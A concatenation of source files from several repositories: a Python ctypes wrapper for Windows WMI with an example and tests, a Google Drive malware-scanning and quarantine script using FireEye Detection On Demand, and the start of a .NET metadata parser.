(_Out_, 'ppCallResult'),
)
_DeleteInstance = prototype(IWbemServices_DeleteInstance_Idx,
'DeleteInstance',
paramflags)
_DeleteInstance.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
return_obj = _DeleteInstance(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def DeleteInstance(self, object_path, flags, ctx):
return_obj = self.DeleteInstanceWithResult(object_path, flags, ctx)
if return_obj:
return_obj.Release()
def DeleteInstanceAsync(self, object_path, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_DeleteInstanceAsync = prototype(IWbemServices_DeleteInstanceAsync_Idx,
'DeleteInstanceAsync',
paramflags)
_DeleteInstanceAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
_DeleteInstanceAsync(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
def CreateInstanceEnum(self, filter_param, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strFilter'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_CreateInstanceEnum = prototype(IWbemServices_CreateInstanceEnum_Idx,
'CreateInstanceEnum',
paramflags)
_CreateInstanceEnum.errcheck = winapi.RAISE_NON_ZERO_ERR
filter_param_bstr = winapi.SysAllocString(filter_param) if filter_param is not None else None
try:
return_obj = _CreateInstanceEnum(self.this,
filter_param_bstr,
flags,
ctx.this if ctx else None
)
finally:
if filter_param_bstr is not None:
winapi.SysFreeString(filter_param_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def CreateInstanceEnumAsync(self, filter_param, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strFilter'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_CreateInstanceEnumAsync = prototype(IWbemServices_CreateInstanceEnumAsync_Idx,
'CreateInstanceEnumAsync',
paramflags)
_CreateInstanceEnumAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
filter_param_bstr = winapi.SysAllocString(filter_param) if filter_param is not None else None
try:
_CreateInstanceEnumAsync(self.this,
filter_param_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if filter_param_bstr is not None:
winapi.SysFreeString(filter_param_bstr)
def ExecQuery(self, query_language, query, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_ExecQuery = prototype(IWbemServices_ExecQuery_Idx,
'ExecQuery',
paramflags)
_ExecQuery.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
return_obj = _ExecQuery(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def ExecQueryAsync(self, query_language, query, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_ExecQueryAsync = prototype(IWbemServices_ExecQueryAsync_Idx,
'ExecQueryAsync',
paramflags)
_ExecQueryAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
_ExecQueryAsync(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
def ExecNotificationQuery(self, query_language, query, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_ExecNotificationQuery = prototype(IWbemServices_ExecNotificationQuery_Idx,
'ExecNotificationQuery',
paramflags)
_ExecNotificationQuery.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
return_obj = _ExecNotificationQuery(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def ExecNotificationQueryAsync(self, query_language, query, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strQueryLanguage'),
(_In_, 'strQuery'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_ExecNotificationQueryAsync = prototype(IWbemServices_ExecNotificationQueryAsync_Idx,
'ExecNotificationQueryAsync',
paramflags)
_ExecNotificationQueryAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
query_language_bstr = winapi.SysAllocString(query_language) if query_language is not None else None
query_bstr = winapi.SysAllocString(query) if query is not None else None
try:
_ExecNotificationQueryAsync(self.this,
query_language_bstr,
query_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if query_language_bstr is not None:
winapi.SysFreeString(query_language_bstr)
if query_bstr is not None:
winapi.SysFreeString(query_bstr)
def ExecMethodWithResult(self, object_path, method_name, flags, ctx, in_params):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemClassObject),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'strMethodName'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pInParams'),
(_Out_, 'ppOutParams'),
(_Out_, 'ppCallResult'),
)
_ExecMethod = prototype(IWbemServices_ExecMethod_Idx,
'ExecMethod',
paramflags)
_ExecMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
method_name_bstr = winapi.SysAllocString(method_name) if method_name is not None else None
try:
return_obj, return_obj2 = _ExecMethod(self.this,
object_path_bstr,
method_name_bstr,
flags,
ctx.this if ctx else None,
in_params.this if in_params else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
if method_name_bstr is not None:
winapi.SysFreeString(method_name_bstr)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemCallResult(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def ExecMethod(self, object_path, method_name, flags, ctx, in_params):
return_obj, return_obj2 = self.ExecMethodWithResult(object_path, method_name, flags, ctx, in_params)
if return_obj2:
return_obj2.Release()
return return_obj
def ExecMethodAsync(self, object_path, method_name, flags, ctx, in_params, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemClassObject),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'strMethodName'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pInParams'),
(_In_, 'pResponseHandler'),
)
_ExecMethodAsync = prototype(IWbemServices_ExecMethodAsync_Idx,
'ExecMethodAsync',
paramflags)
_ExecMethodAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
method_name_bstr = winapi.SysAllocString(method_name) if method_name is not None else None
try:
_ExecMethodAsync(self.this,
object_path_bstr,
method_name_bstr,
flags,
ctx.this if ctx else None,
in_params.this if in_params else None,
response_handler.this if response_handler else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
if method_name_bstr is not None:
winapi.SysFreeString(method_name_bstr)
IWbemLocator_ConnectServer_Idx = 3
class IWbemLocator(com.IUnknown):
def ConnectServer(self, network_resource, user, password, locale, security_flags, authority, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
BSTR,
BSTR,
BSTR,
ctypes.c_long,
BSTR,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strNetworkResource'),
(_In_, 'strUser'),
(_In_, 'strPassword'),
(_In_, 'strLocale'),
(_In_, 'lSecurityFlags'),
(_In_, 'strAuthority'),
(_In_, 'pCtx'),
(_Out_, 'ppNamespace'),
)
_ConnectServer = prototype(IWbemLocator_ConnectServer_Idx,
'ConnectServer',
paramflags)
_ConnectServer.errcheck = winapi.RAISE_NON_ZERO_ERR
network_resource_bstr = winapi.SysAllocString(network_resource) if network_resource is not None else None
user_bstr = winapi.SysAllocString(user) if user is not None else None
password_bstr = winapi.SysAllocString(password) if password is not None else None
locale_bstr = winapi.SysAllocString(locale) if locale is not None else None
authority_bstr = winapi.SysAllocString(authority) if authority is not None else None
try:
return_obj = _ConnectServer(self.this,
network_resource_bstr,
user_bstr,
password_bstr,
locale_bstr,
security_flags,
authority_bstr,
ctx.this if ctx else None
)
finally:
if network_resource_bstr is not None:
winapi.SysFreeString(network_resource_bstr)
if user_bstr is not None:
winapi.SysFreeString(user_bstr)
if password_bstr is not None:
winapi.SysFreeString(password_bstr)
if locale_bstr is not None:
winapi.SysFreeString(locale_bstr)
if authority_bstr is not None:
winapi.SysFreeString(authority_bstr)
try:
return_obj = IWbemServices(return_obj)
except WindowsError:
return_obj = None
return return_obj
class WMI(com.COM):
'''
Wrapper class for WMI interactions. WMI initialization / uninitialization are done via ctxmgr.
N.B. If using this class, do not call init() and fini() directly. Only use through via ctxmgr
'''
def __init__(self,
net_resource,
user=None,
password=<PASSWORD>,
locale=None,
sec_flags=0,
auth=None,
ctx=None,
cls_ctx=com.CLSCTX_INPROC_SERVER,
authn_svc=winapi.RPC_C_AUTHN_WINNT,
authz_svc=winapi.RPC_C_AUTHZ_NONE,
spn=None,
auth_info=None,
coinit=com.COINIT_MULTITHREADED,
authn_level=winapi.RPC_C_AUTHN_LEVEL_DEFAULT,
imp_level=winapi.RPC_C_IMP_LEVEL_IMPERSONATE,
auth_list=None,
capabilities=winapi.EOAC_NONE):
self._net_resource = net_resource
self._user = user
self._password = password
self._locale = locale
self._sec_flags = sec_flags
self._auth = auth
self._ctx = ctx
self._cls_ctx = cls_ctx
self._authn_svc = authn_svc
self._authz_svc = authz_svc
self._spn = spn
self._auth_info = auth_info
self._authn_level = authn_level
self._imp_level = imp_level
self._auth_list = auth_list
self._capabilities = capabilities
self.service = None
super(WMI, self).__init__(coinit)
def __enter__(self):
self.init()
return self.service
def __exit__(self, exc_type, exc_val, exc_tb):
self.fini()
def init(self):
super(WMI, self).init()
self.initialize_security(None,
-1,
None,
self._authn_level,
self._imp_level,
self._auth_list,
self._capabilities)
locator = self.create_instance(winapi.CLSID_WbemLocator,
None,
self._cls_ctx,
winapi.IID_IWbemLocator,
IWbemLocator)
try:
self.service = locator.ConnectServer(self._net_resource,
self._user,
self._password,
self._locale,
self._sec_flags,
self._auth,
self._ctx)
finally:
locator.Release()
self.set_proxy_blanket(self.service.this,
self._authn_svc,
self._authz_svc,
self._spn,
self._authn_level,
self._imp_level,
self._auth_info,
self._capabilities)
def fini(self):
while self.service.Release():
pass
super(WMI, self).fini()
```
#### File: cWMI/examples/create_process.py
```python
import argparse
import cwmi
def create_process(path):
out = cwmi.call_method('root\\cimv2', 'Win32_Process', 'Create', {'CommandLine': path})
ret = out['ReturnValue']
if not ret:
print('Process created successfully with process id of {:d}'.format(out['ProcessId']))
else:
print('Process not created successfully, ERROR is {:d}'.format(ret))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path', help='Full path to executable', required=True)
parsed_args = parser.parse_args()
create_process(parsed_args.path)
```
#### File: cWMI/tests/test_com.py
```python
import unittest
from cwmi import com
from cwmi import wmi
from cwmi import winapi
class TestCOM(unittest.TestCase):
def setUp(self):
self.instance = com.COM()
self.instance.init()
self.instance.initialize_security()
def tearDown(self):
self.instance.fini()
def test_iunknown(self):
"""
Tests the IUnknown interface
:return: None
"""
obj = self.instance.create_instance(winapi.CLSID_WbemLocator,
None,
com.CLSCTX_INPROC_SERVER,
winapi.IID_IWbemLocator,
com.IUnknown)
obj.QueryInterface(winapi.IID_IWbemLocator)
count = obj.AddRef()
assert count == 3
count = obj.Release()
assert count == 2
count = obj.Release()
assert count == 1
count = obj.Release()
assert count == 0
def test_com_create_instance(self):
"""
Tests the ability to create a COM object instance
:return: None
"""
obj = self.instance.create_instance(winapi.CLSID_WbemLocator,
None,
com.CLSCTX_INPROC_SERVER,
winapi.IID_IWbemLocator,
wmi.IWbemLocator)
assert obj.Release() == 0
def test_com_set_proxy_blanket(self):
"""
Tests the ability to set security on object
:return: None
"""
locator = self.instance.create_instance(winapi.CLSID_WbemLocator,
None,
com.CLSCTX_INPROC_SERVER,
winapi.IID_IWbemLocator,
wmi.IWbemLocator)
assert locator.this
svc = locator.ConnectServer('root\\cimv2', None, None, None, 0, None, None)
assert svc.this
self.instance.set_proxy_blanket(svc.this)
assert locator.Release() == 0
assert svc.Release() == 0
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4k4xs4pH1r3/dod-example-apps",
"score": 2
} |
#### File: dod-example-apps/google_drive/google_drive_detection_threaded.py
```python
from __future__ import print_function
import fireeyepy
import concurrent.futures
import json
from datetime import datetime
import pickle
import time
import os.path
from io import BytesIO
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
from googleapiclient.discovery import build
import secrets
WORKER_THREADS=5 # Be careful how many threads you spawn to avoid reaching API rate limits
DOD_API_KEY = secrets.keys['DOD_API_KEY']
REPORT_RETRY_TIME = 5 # Wait 'n' seconds between each poll to the /reports endpoint to get the status of file reports
DOD_FILE_SIZE_LIMIT = 32000000 # 32 MB in SI units. Files larger than this won't be downloaded from GDrive since DoD won't accept them.
QUARANTINE_FOLDER_NAME = "Quarantine" # Name of the folder to put malicious files in. If this folder doesn't exist, the script will create it.
SCOPES = ['https://www.googleapis.com/auth/drive']
# Initialize credentials for Google API (https://developers.google.com/drive/api/v3/quickstart/python?authuser=1)
def initGoogleCreds():
# Authorize with Google Drive
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'./credentials.json', SCOPES)
creds = flow.run_local_server(port=8080)
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
return creds
# Get the id of the folder that will be used to quarantine malicious files. If it doesn't exist, create it.
def initQuarantineFolder(google_service, name=QUARANTINE_FOLDER_NAME):
# Get the quarantine folder iD. If it doesn't exist, create it.
results = google_service.files().list(q="mimeType='application/vnd.google-apps.folder' and name='{}'".format(name),
spaces='drive',
fields='files(id)').execute()
folders = results.get('files', [])
if len(folders) > 0:
quarantine_folder_id = folders[0]["id"]
else:
# Create the Quarantine folder
file_metadata = {
'name': name,
'mimeType': 'application/vnd.google-apps.folder'
}
folder = google_service.files().create(body=file_metadata, fields='id').execute()
quarantine_folder_id = folder.get('id')
return quarantine_folder_id
# Get a list of files in the drive account. Exclude folders, files in the trash, and files in the Quarantine folder
# Only return files that have been CREATED at or after the supplied timestamp. Follow pagination to get every file
# that meets these conditions.
def getFiles(google_service, includeTrash=False, excludedFolderIDs=[], createdAfterTime=""):
query = "mimeType != 'application/vnd.google-apps.folder' and trashed = {}".format(includeTrash)
# Add ecluded folders to the query
for id in excludedFolderIDs:
query += " and not '{}' in parents".format(id)
# Only return files created after the specified date. If no date provided, get all files.
if createdAfterTime:
query += " and createdTime > '{}'".format(createdAfterTime)
result = []
page_token = None
while True:
param = {
'q': query,
'pageSize': 1000, # Maximum supported by Drive API
'fields': "nextPageToken, files(id, name, mimeType, size)"
}
if page_token:
param['pageToken'] = page_token
files = google_service.files().list(**param).execute()
result.extend(files['files'])
page_token = files.get('nextPageToken')
if not page_token:
break
return result
# Download the file from Google Drive and submit to DoD for malware scanning.
def downloadAndScanFile(creds, detection_client, file, quarantine_folder_id):
google_service = build('drive', 'v3', credentials=creds)
try:
request = google_service.files().get_media(fileId=file["id"])
# Keep the files in memory instead of saved to disk since we need to upload to DoD
fh = BytesIO()
downloader = MediaIoBaseDownload(fh, request)
downloader.next_chunk(num_retries=1)
print(f"Downloaded from GDrive: {file}")
# Submit file handler to DoD for scanning.
response = detection_client.submit_file(
files={
"file": (file["name"], fh.getvalue())
}
)
if response["status"] == "success":
quarantineMaliciousFile(google_service, detection_client, response["report_id"], file["id"], quarantine_folder_id)
except Exception as e:
print(e)
# Continuously poll the report until it is done and returns a verdict. If the file is malicious, then move
# it to the designated quarantine folder.
def quarantineMaliciousFile(google_service, detection_client, report_id, file_id, quarantine_folder_id):
print(f"Checking report {report_id}")
try:
report = detection_client.get_report(report_id)
while report["overall_status"] != "DONE":
time.sleep(REPORT_RETRY_TIME) # Wait a little bit to allow the detection engine to finish the report
report = detection_client.get_report(report_id)
if report["is_malicious"]:
print(f'{report["file_name"]} is malicious. Moving to {QUARANTINE_FOLDER_NAME}.')
# Retrieve the existing parents folder to be removed
file = google_service.files().get(fileId=file_id,
fields='parents').execute()
previous_parents = ",".join(file.get('parents'))
# Move the file to the new folder
file = google_service.files().update(fileId=file_id,
addParents=quarantine_folder_id,
removeParents=previous_parents,
fields='id, parents').execute()
except fireeyepy.ClientError as e:
print(e)
def main(settings):
detection_client = fireeyepy.Detection(key=DOD_API_KEY)
creds = initGoogleCreds()
google_service = build('drive', 'v3', credentials=creds)
quarantine_folder_id = initQuarantineFolder(google_service)
# Get the time this script was last run so we only get files from Google Drive that have been created since the last run
lastRunAt = ""
if settings['lastRunAt']:
lastRunAt = settings['lastRunAt']
else:
settings['lastRunAt'] = "" # Initialize the lastRunAt setting so we can update it later
# Uncomment below line to only scan new files
files = getFiles(google_service, excludedFolderIDs=[quarantine_folder_id], createdAfterTime=lastRunAt)
# Uncomment below line to scan all files
# files = getFiles(google_service, excludedFolderIDs=[quarantine_folder_id])
with concurrent.futures.ThreadPoolExecutor(max_workers=WORKER_THREADS) as executor:
for file in files:
if "size" in file:
if int(file["size"]) <= DOD_FILE_SIZE_LIMIT:
# Create a new google service object for each thread since it isn't thread safe. Based on this issue (https://github.com/googleapis/google-api-python-client/issues/626)
executor.submit(downloadAndScanFile, creds, detection_client, file, quarantine_folder_id)
else:
print(f'Skipping file {file["name"]} since it is greater than the DoD file size limit.')
else:
print(f'Skipping file {file["name"]} since it is most likely a shared file not owned by the user.')
if __name__ == '__main__':
# Read in the settings file
with open('settings.json') as json_file:
settings = json.load(json_file)
start_time = time.time()
main(settings)
print(f"--- {(time.time() - start_time)} seconds ---")
# Upon successful completion of the script, update the lastRunAt setting. If the script
# fails, then this won't execute so we can fix the issue and retry without missing any files.
settings['lastRunAt'] = datetime.utcnow().isoformat().split('.')[0] # Split on the period to remove the milliseconds
with open('settings.json', 'w') as outfile:
json.dump(settings, outfile)
``` |
{
"source": "4k4xs4pH1r3/jitm",
"score": 2
} |
#### File: jitm/Scripts/pydnet.py
```python
import pefile
import struct
import logging
from vstruct import VStruct, primitives as vp
DWORD_SIZE = 4
DNT_Module = 0
DNT_TypeRef = 1
DNT_TypeDef = 2
DNT_Field = 4
DNT_MethodDef = 6
DNT_Param = 8
DNT_InterfaceImpl = 9
DNT_MemberRef = 10
DNT_Constant = 11
DNT_CustomAttribute = 12
DNT_FieldMarshal = 13
DNT_DeclSecurity = 14
DNT_ClassLayout = 15
DNT_FieldLayout = 16
DNT_StandAloneSig = 17
DNT_EventMap = 18
DNT_Event = 20
DNT_PropertyMap = 21
DNT_Property = 23
DNT_MethodSemantics = 24
DNT_MethodImpl = 25
DNT_ModuleRef = 26
DNT_TypeSpec = 27
DNT_ImplMap = 28
DNT_FieldRVA = 29
DNT_Assembly = 32
DNT_AssemblyProcessor = 33
DNT_AssemblyOS = 34
DNT_AssemblyRef = 35
DNT_AssemblyRefProcessor = 36
DNT_AssemblyRefOS = 37
DNT_File = 38
DNT_ExportedType = 39
DNT_ManifestResource = 40
DNT_NestedClass = 41
DNT_GenericParam = 42
DNT_MethodSpec = 43
DNT_GenericParamConstraint = 44
DNT_Types = [
DNT_Module,
DNT_TypeRef,
DNT_TypeDef,
DNT_Field,
DNT_MethodDef,
DNT_Param,
DNT_InterfaceImpl,
DNT_MemberRef,
DNT_Constant,
DNT_CustomAttribute,
DNT_FieldMarshal,
DNT_DeclSecurity,
DNT_ClassLayout,
DNT_FieldLayout,
DNT_StandAloneSig,
DNT_EventMap,
DNT_Event,
DNT_PropertyMap,
DNT_Property,
DNT_MethodSemantics,
DNT_MethodImpl,
DNT_ModuleRef,
DNT_TypeSpec,
DNT_ImplMap,
DNT_FieldRVA,
DNT_Assembly,
DNT_AssemblyProcessor,
DNT_AssemblyOS,
DNT_AssemblyRef,
DNT_AssemblyRefProcessor,
DNT_AssemblyRefOS,
DNT_File,
DNT_ExportedType,
DNT_ManifestResource,
DNT_NestedClass,
DNT_GenericParam,
DNT_MethodSpec,
DNT_GenericParamConstraint,
]
DNT_Names = {
DNT_Module: 'DNT_Module',
DNT_TypeRef: 'DNT_TypeRef',
DNT_TypeDef: 'DNT_TypeDef',
DNT_Field: 'DNT_Field',
DNT_MethodDef: 'DNT_MethodDef',
DNT_Param: 'DNT_Param',
DNT_InterfaceImpl: 'DNT_InterfaceImpl',
DNT_MemberRef: 'DNT_MemberRef',
DNT_Constant: 'DNT_Constant',
DNT_CustomAttribute: 'DNT_CustomAttribute',
DNT_FieldMarshal: 'DNT_FieldMarshal',
DNT_DeclSecurity: 'DNT_DeclSecurity',
DNT_ClassLayout: 'DNT_ClassLayout',
DNT_FieldLayout: 'DNT_FieldLayout',
DNT_StandAloneSig: 'DNT_StandAloneSig',
DNT_EventMap: 'DNT_EventMap',
DNT_Event: 'DNT_Event',
DNT_PropertyMap: 'DNT_PropertyMap',
DNT_Property: 'DNT_Property',
DNT_MethodSemantics: 'DNT_MethodSemantics',
DNT_MethodImpl: 'DNT_MethodImpl',
DNT_ModuleRef: 'DNT_ModuleRef',
DNT_TypeSpec: 'DNT_TypeSpec',
DNT_ImplMap: 'DNT_ImplMap',
DNT_FieldRVA: 'DNT_FieldRVA',
DNT_Assembly: 'DNT_Assembly',
DNT_AssemblyProcessor: 'DNT_AssemblyProcessor',
DNT_AssemblyOS: 'DNT_AssemblyOS',
DNT_AssemblyRef: 'DNT_AssemblyRef',
DNT_AssemblyRefProcessor: 'DNT_AssemblyRefProcessor',
DNT_AssemblyRefOS: 'DNT_AssemblyRefOS',
DNT_File: 'DNT_File',
DNT_ExportedType: 'DNT_ExportedType',
DNT_ManifestResource: 'DNT_ManifestResource',
DNT_NestedClass: 'DNT_NestedClass',
DNT_GenericParam: 'DNT_GenericParam',
DNT_MethodSpec: 'DNT_MethodSpec',
DNT_GenericParamConstraint: 'DNT_GenericParamConstraint',
}
class DNetDirectory(VStruct):
def __init__(self):
super(DNetDirectory, self).__init__()
self.cb = vp.v_uint32()
self.nMajor = vp.v_uint16()
self.nMinor = vp.v_uint16()
self.nMetaDataRVA = vp.v_uint32()
self.nMetaDataSize = vp.v_uint32()
class DNetMetaDataHeader(VStruct):
def __init__(self):
super(DNetMetaDataHeader, self).__init__()
self.Signature = vp.v_uint32()
self.nMajor = vp.v_uint16()
self.nMinor = vp.v_uint16()
self.reserved = vp.v_uint32()
self.nVersionLength = vp.v_uint32()
def vsParse(self, bytez, offset, fast=True):
super(DNetMetaDataHeader, self).vsParse(bytez, offset, fast)
here = 0x10 + offset
version_end_offset = here + self.nVersionLength
sVersion = bytez[here:version_end_offset]
self.sVersion = vp.v_str(len(sVersion))
self.sVersion = sVersion
sFlags = bytez[version_end_offset:version_end_offset + 2]
self.nFlags = vp.v_uint16(struct.unpack("<H", sFlags)[0])
sNumberOfStreams = bytez[version_end_offset + 2:version_end_offset + 4]
self.nNumberOfSteams = vp.v_uint16(
struct.unpack("<H", sNumberOfStreams)[0])
class DNetStreamInfo(VStruct):
def __init__(self):
super(DNetStreamInfo, self).__init__()
self.nOffset = vp.v_uint32()
self.nSize = vp.v_uint32()
def vsParse(self, bytez, offset, fast=True):
super(DNetStreamInfo, self).vsParse(bytez, offset, fast)
here = offset + len(self)
_s = []
offset = here
while bytez[offset] != '\x00':
_s.append(bytez[offset])
offset += 1
_slen = len(_s)
nblocks = (_slen // DWORD_SIZE) + 1
slen = nblocks * DWORD_SIZE
self.sName = vp.v_str(slen)
sName = bytez[here:here + slen]
self.sName = sName
class DNetTablesHeader(VStruct):
def __init__(self):
super(DNetTablesHeader, self).__init__()
self.nReserve = vp.v_uint32()
self.nUnknown = vp.v_uint32()
self.nMaskValidLow = vp.v_uint32()
self.nMaskValidHigh = vp.v_uint32()
self.nMaskSortedLow = vp.v_uint32()
self.nMaskSortedHigh = vp.v_uint32()
def vsParse(self, *args, **kwargs):
super(DNetTablesHeader, self).vsParse(*args, **kwargs)
self.nMaskValid = (self.nMaskValidHigh << 32) + self.nMaskValidLow
self.nMaskSorted = (self.nMaskSortedHigh << 32) + self.nMaskSortedLow
class DNetTableRow_Module(VStruct):
def __init__(self):
super(DNetTableRow_Module, self).__init__()
self.Generation = vp.v_uint16()
self.Name = vp.v_uint16()
self.Mvid = vp.v_uint16()
self.EncId = vp.v_uint16()
self.EncBaseId = vp.v_uint16()
class DNetTableRow_TypeRef(VStruct):
def __init__(self):
super(DNetTableRow_TypeRef, self).__init__()
self.ResolutionScope = vp.v_uint16()
self.Name = vp.v_uint16()
self.Namespace = vp.v_uint16()
class DNetTableRow_TypeDef(VStruct):
def __init__(self):
super(DNetTableRow_TypeDef, self).__init__()
self.Flags = vp.v_uint32()
self.Name = vp.v_uint16()
self.Namspace = vp.v_uint16()
self.Extends = vp.v_uint16()
self.FieldList = vp.v_uint16()
self.MethodList = vp.v_uint16()
class DNetTableRow_Field(VStruct):
def __init__(self):
super(DNetTableRow_Field, self).__init__()
self.Flags = vp.v_uint16()
self.Name = vp.v_uint16()
self.Signature = vp.v_uint16()
class DNetTableRow_MethodDef(VStruct):
def __init__(self):
super(DNetTableRow_MethodDef, self).__init__()
self.RVA = vp.v_uint32()
self.ImplFlags = vp.v_uint16()
self.Flags = vp.v_uint16()
self.Name = vp.v_uint16()
self.Signature = vp.v_uint16()
self.ParamList = vp.v_uint16()
def vsParse(self, bytez, offset, fast=True):
super(DNetTableRow_MethodDef, self).vsParse(bytez, offset, fast)
self.nOffset = offset
self.nToken = 0
def GetMaskNumberByBits(nBits):
if nBits < 0:
return None
return 1 << nBits
def MIDToToken(nMid):
return 0x6000000 + nMid
def TokenToMid(nToken):
return nToken & 0xFFFFFF
class PyDNet(object):
def __init__(self, filename, debug=False):
self.filename = filename
self.pe = pefile.PE(self.filename)
with open(self.filename, 'rb') as _ifile:
self.filedata = [ord(_) for _ in _ifile.read()]
self.filesize = len(self.filedata)
# ---------------------------------------------------------------------
self.Methods = None
self.DNetDirectory = None
self.nDNetDirectoryOffset = None
# ---------------------------------------------------------------------
self.logger = logging.getLogger(self.__class__.__name__)
self.logger.debug("Initialized!")
def Parse(self):
'''
Parse the file specified the filename when __init__() is called.
'''
with open(self.filename, 'rb') as _ifile:
pedata = _ifile.read()
de = self._GetDNetEntry()
if de is None:
raise RuntimeError(".NET directory not found")
nDirectoryBaseOffset = de.VirtualAddress
self.nDNetDirectoryOffset = self.FileOffsetFromRVA(de.VirtualAddress)
self.logger.debug(
".NET directory file offset: %s",
